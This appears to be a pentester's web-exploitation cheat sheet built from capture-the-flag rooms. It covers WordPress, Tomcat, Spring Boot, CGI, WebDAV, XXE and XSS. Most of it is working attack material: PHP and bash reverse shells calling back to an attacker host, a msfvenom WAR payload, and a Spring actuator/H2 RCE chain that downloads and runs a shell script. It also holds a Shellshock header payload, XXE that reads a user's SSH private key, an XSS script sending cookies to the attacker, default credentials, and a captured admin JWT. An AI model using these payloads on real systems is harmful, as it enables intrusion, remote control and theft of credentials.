Web

Wordpress

Reverse Shell #1 - Edit existing Plugin

Examples

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php

Update the page with your reverse shell then save. This will make the plugin not appear anymore under Installed Plugins

Curl the page to activate it.

Kali

curl http://$VICTIM/wp-content/plugins/akismet/akismet.php

Reverse Shell #2 - Upload Plugin

Examples

Mr Robot CTF Retro

revshell.php code

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>

Kali

vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443

TomCat

Common usernames and passwords

Examples

Thompson

tomcat
s3cret

Reverse Shell

Examples

Thompson

Kali

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI LPORT=1337 -f war > rshell.war
nc -lvnp 1337

Spring Boot

Reverse Shell

Examples

Initial Shell

Exploit: https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database/

Kali #1

tcpdump -i ens5 icmp

Below example checks the IP which may not be necessary.

Kali #2

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'ping -c 5 $KALI\');\"}' "https://$VICTIM/actuator/env" -k

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k

reverse.sh

bash -c "bash -i >& /dev/tcp/$KALI/1337 0>&1"

Kali #1

python3 -m http.server 81

Kali #2

nc -lvnp 1337

Download payload

Kali #3

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'wget http://$KALI:81/reverse.sh -O /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k

Run payload

Kali #3

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'bash /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k

See CMDS from page source

Examples

Jack-of-All-Trades

Sometimes you can't see the results of the output from the page so you need to check the page source.

view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami

Kali

nc -lvnp 1337

Browser

view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337

CGI-Bin

Scanning

Examples

0day

See if a cgi-bin folder appears in the inital scans, if it does start scanning that direcoty for .cgi files.

Kali

gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi

Shell

Examples

0day

Link: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi

Kali#1

nc -lvnp 4242

Kali #2

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi

Change request type

Examples

Mother's Secret

Change the request to POST and add everything else highlighted, we see the status message now changes.

Now we change the yaml to the the emergency override code mentioned in the room.

Now we perform the same steps again except this time for the api/nostromo route and the new file we discovered.

WebDav Cadvaer

If server is using WebDav and we have credentials we can login and upload files.

Examples

Dav

Kali

cadaver http://$VICTIM:80/webdav
Username: wampp
Password: xampp
dav:/webdav/> put shell.php shell.php

XXE Injection

Exploiting XXE - In-Band

Examples

Exploiting XXE - In-Band

Exploiting XXE - Out-of-Band

Examples

Exploiting XXE - Out-of-Band

SSRF + XXE

Examples

SSRF + XXE

XML-RPC

Check if it is enabled

Examples

Retro

wpscan or a scan maybe able identified that xmlrpc.php exists, if it is check if it is enabled.

POST /$SITE/xmlrpc.php HTTP/1.1
Host: $VICTIM
Content-Length: 91

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

View Files

Examples

Mustacchio XEE - Read files

Input

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>&xxe;</com>
</comment>

Base64 encode the file

<!DOCTYPE replace [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=acc.php"> ]>

<search>&test;</search>

XSS

Reflected XSS

Examples

Reflected XSS

CVE-2023-38501 - Vulnerable Web Application 1

Stored XSS

Examples

Reflected XSS

CVE-2021-38757 - Vulnerable Web Application 2

Dom-Based XSS

Examples

DOM-Based XSS

XSS - Steal JVT

Examples

XSS - Steal JVT

https://jwt.io/

I tried updating the token it didn't work

Next we're going to try to steal the JWT from another user.

Kali

nc -lvnp 4444

Browser

<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>

This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button

we got a token from a user that isn't us

We can see it is from Michael who is an admin.

Sent again but this time just forwarded the request so we could see what that script was doing

The script was printing the flag

This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.

Brower cookie

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY

CSRF

Examples

CSRF

PreviousActive Directory NextEnumeration & Brute Force

Last updated 1 year ago